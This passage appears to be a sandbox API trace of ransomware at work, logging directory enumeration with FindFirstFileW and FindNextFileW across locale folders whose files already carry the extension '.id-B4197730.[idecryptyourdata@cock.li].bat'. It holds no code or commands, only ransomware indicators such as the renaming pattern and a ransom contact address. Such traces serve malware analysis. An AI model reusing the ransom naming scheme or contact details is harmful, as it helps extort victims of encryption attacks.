ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd53fe4c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.240] FindClose (in: hFindFile=0x728008 | out: hFindFile=0x728008) returned 1 [0156.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.240] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1045", cAlternateFileName="")) returned 1 [0156.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.240] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728148 [0156.261] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.261] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd99237e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd99237e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda50d7a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x10b4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.261] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd9b852d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd9b852d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda2ab27, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x142c6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.261] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd53fe4c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd53fe4c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd565f3a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.261] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd53fe4c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd53fe4c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd565f3a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.261] FindClose (in: hFindFile=0x728148 | out: hFindFile=0x728148) returned 1 [0156.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.262] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1046", cAlternateFileName="")) returned 1 [0156.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.262] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728408 [0156.263] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.263] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb82020, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb82020, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdba8199, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf54, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.264] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda50d7a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda50d7a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdac340c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13c66, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.264] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd565f3a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd565f3a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda50d7a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.264] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd565f3a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd565f3a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda50d7a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.264] FindClose (in: hFindFile=0x728408 | out: hFindFile=0x728408) returned 1 [0156.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.265] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1049", cAlternateFileName="")) returned 1 [0156.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.265] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728388 [0156.266] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.266] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda50d7a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda50d7a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdae9669, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xd5a4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.266] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdae9669, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdae9669, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb35ae9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13f46, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.266] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5fe9c3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5fe9c3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd5fe9c3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.266] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5fe9c3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5fe9c3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd5fe9c3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.266] FindClose (in: hFindFile=0x728388 | out: hFindFile=0x728388) returned 1 [0156.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.267] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1053", cAlternateFileName="")) returned 1 [0156.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.267] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x7280c8 [0156.268] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.268] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb0f91e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb0f91e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb35ae9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.268] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb5be49, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb5be49, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb82020, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13076, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.269] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5fe9c3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5fe9c3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd624b3b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.269] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5fe9c3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5fe9c3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd624b3b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.269] FindClose (in: hFindFile=0x7280c8 | out: hFindFile=0x7280c8) returned 1 [0156.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.270] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1055", cAlternateFileName="")) returned 1 [0156.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.270] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728248 [0156.271] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.271] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb5be49, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb5be49, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdc1aa71, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.271] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb82020, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb82020, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdbf4763, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x12d16, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.271] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd624b3b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd624b3b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdba8199, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.271] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd624b3b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd624b3b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdba8199, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.271] FindClose (in: hFindFile=0x728248 | out: hFindFile=0x728248) returned 1 [0156.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.272] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="2052", cAlternateFileName="")) returned 1 [0156.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.272] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727e08 [0156.273] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.273] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdba8199, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdba8199, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdbce539, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.273] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdbf4763, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdbf4763, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdc8d01d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xee06, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.274] FindNextFileW (in: hFindFile=0x727e08, 